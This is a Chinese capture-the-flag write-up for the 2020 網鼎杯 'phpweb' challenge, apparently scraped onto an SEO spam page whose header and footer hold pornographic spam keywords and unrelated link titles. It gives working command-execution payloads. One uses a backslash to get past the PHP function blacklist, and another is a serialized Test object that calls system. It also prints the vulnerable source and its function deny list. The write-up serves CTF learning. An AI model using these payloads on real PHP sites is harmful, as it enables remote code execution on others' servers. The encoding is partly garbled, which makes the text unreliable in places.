中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

西安做網(wǎng)站印象網(wǎng)絡(luò)整合營銷策劃

西安做網(wǎng)站印象網(wǎng)絡(luò),整合營銷策劃,網(wǎng)站建設(shè)項(xiàng)目報(bào)告書,中企動(dòng)力銷售陪酒多嗎BUU [網(wǎng)鼎杯 2020 朱雀組]phpweb 眾生皆懶狗。打開題目,只有一個(gè)報(bào)錯(cuò),不知何從下手。 翻譯一下報(bào)錯(cuò),data()函數(shù):,還是沒有頭緒,中國有句古話說的好“遇事不決抓個(gè)包” 抓個(gè)包果然有東西,仔細(xì)一看這不就分別是函數(shù)和參…

BUU [網(wǎng)鼎杯 2020 朱雀組]phpweb

眾生皆懶狗。打開題目,只有一個(gè)報(bào)錯(cuò),不知何從下手。

img

翻譯一下報(bào)錯(cuò),data()函數(shù):,還是沒有頭緒,中國有句古話說的好“遇事不決抓個(gè)包”

img

抓個(gè)包果然有東西,仔細(xì)一看這不就分別是函數(shù)和參數(shù)嗎,試一下別的,從報(bào)錯(cuò)發(fā)現(xiàn)和函數(shù)call_user_func()有關(guān)系。

img

img

試一下命令執(zhí)行有過濾,難辦,那還是得辦。從這里開始分為兩種方法了。

img

法一:

繞過過濾:

\system("ls");

\system可以繞過黑名單的原因:php內(nèi)的" \ "在做代碼執(zhí)行的時(shí)候,會(huì)識(shí)別特殊字符串。

Payload:func=\system&p=tac $(find / -name fla*)

一步到位。

img

法二:

利用file_get_contents獲取index.php的源碼,

func=file_get_contents&p=index.php

源碼如下

  <?php$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");function gettime($func, $p) {
?    $result = call_user_func($func, $p);
?    $a= gettype($result);
?    if ($a == "string") {
?      return $result;
?    } else {return "";}}class Test {
?    var $p = "Y-m-d h:i:s a";
?    var $func = "date";
?    function __destruct() {
?      if ($this->func != "") {
?        echo gettime($this->func, $this->p);
?      }
?    }}$func = $_REQUEST["func"];$p = $_REQUEST["p"];if ($func != null) {
?    $func = strtolower($func);
?    if (!in_array($func,$disable_fun)) {
?      echo gettime($func, $p);
?    }else {
?      die("Hacker...");
?    }}?>

媽呀過濾的真多,麻了,幸好沒有去一個(gè)一個(gè)測試。

分析一下代碼,是存在反序列化漏洞的。我們可以傳進(jìn)去 f u n c = u n s e r i a l i z e , func=unserialize, func=unserialize,p=序列化后的字符串??梢孕蛄谢疶ext類,其中var $p = “tac $(find / -name fla*)”;var $func = “system”;【注意這里的類里面的func和p與傳進(jìn)去的不一樣,不需要進(jìn)行過濾】,貌似反序列化的題經(jīng)常喜歡拿名字一樣的兩個(gè)東西來混淆視聽,這個(gè)應(yīng)該是考察我們對(duì)序列化和代碼的理解能力。

構(gòu)造exp

img

Payload:

func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A24%3A%22tac+%24%28find+%2F+-name+fla%2A%29%22%3Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3B%7D

(這里應(yīng)該是可以不url編碼直接傳字符串的)

也可以是Payload:

func=unserialize&p=O:4:“Test”:2:{s:1:“p”;s:24:“tac $(find / -name fla*)”;s:4:“func”;s:6:“system”;}

img

補(bǔ)充法:

好像也可以利用highlight_file或者show_source獲取index.php的源碼,做法和法二一樣。

http://m.risenshineclean.com/news/45972.html

相關(guān)文章:

  • 新鄉(xiāng)網(wǎng)站建設(shè)哪家正規(guī)不需要驗(yàn)證碼的廣告平臺(tái)
  • 低價(jià)的網(wǎng)站建設(shè)互聯(lián)網(wǎng)公司排名2021
  • 太原做網(wǎng)站的惠州seo排名公司
  • 永久免費(fèi)網(wǎng)站建立國內(nèi)新聞最新消息今天
  • 建設(shè)部網(wǎng)站施工合同公司官網(wǎng)開發(fā)制作
  • dw如何用表格做網(wǎng)站深圳網(wǎng)站設(shè)計(jì)知名樂云seo
  • 閘北專業(yè)做網(wǎng)站seo搜索引擎實(shí)訓(xùn)心得體會(huì)
  • 簡單模板網(wǎng)站制作時(shí)間百度優(yōu)化是什么意思
  • 武漢網(wǎng)站建設(shè)老牌公司適合推廣的app有哪些
  • 網(wǎng)站建設(shè)代碼生成器重慶seo外包平臺(tái)
  • dw軟件做二級(jí)連接網(wǎng)站長春網(wǎng)站制作推廣
  • 南京美容網(wǎng)站建設(shè)營銷案例
  • 網(wǎng)站建設(shè)報(bào)價(jià)明細(xì)表指數(shù)分布的分布函數(shù)
  • 福州正規(guī)網(wǎng)站建設(shè)公司報(bào)價(jià)雙灤區(qū)seo整站排名
  • 蕪湖做公司網(wǎng)站網(wǎng)站優(yōu)化排名網(wǎng)站
  • 哪個(gè)教育網(wǎng)站做助理造價(jià)師培訓(xùn)關(guān)鍵詞優(yōu)化排名用哪些軟件比較好
  • 手機(jī)網(wǎng)站推廣怎么做軟文營銷常用的方式
  • 凡科做的網(wǎng)站手機(jī)版目錄搜索引擎有哪些
  • 有什么軟件可以找客戶搜索引擎營銷與seo優(yōu)化
  • 網(wǎng)站admin目錄名怎么改百度運(yùn)營公司
  • 做網(wǎng)站可以用python么谷歌搜索入口365
  • 做網(wǎng)站需要填什么軟文推廣代表平臺(tái)
  • 工業(yè)b2b網(wǎng)站建設(shè)網(wǎng)站推廣的目的
  • 閘北區(qū)網(wǎng)站建設(shè)搜索推廣代運(yùn)營
  • 官方網(wǎng)站平臺(tái)有哪些百度關(guān)鍵字推廣費(fèi)用
  • 自己做電影網(wǎng)站可以賺錢嗎新媒體運(yùn)營培訓(xùn)班
  • 懶人做圖網(wǎng)站江門seo
  • 國外家譜網(wǎng)站的建設(shè)關(guān)鍵詞排名怎么做上首頁
  • 四川成都最新新聞事件今天深圳谷歌seo推廣
  • 自己的服務(wù)器做網(wǎng)站優(yōu)速網(wǎng)站建設(shè)優(yōu)化seo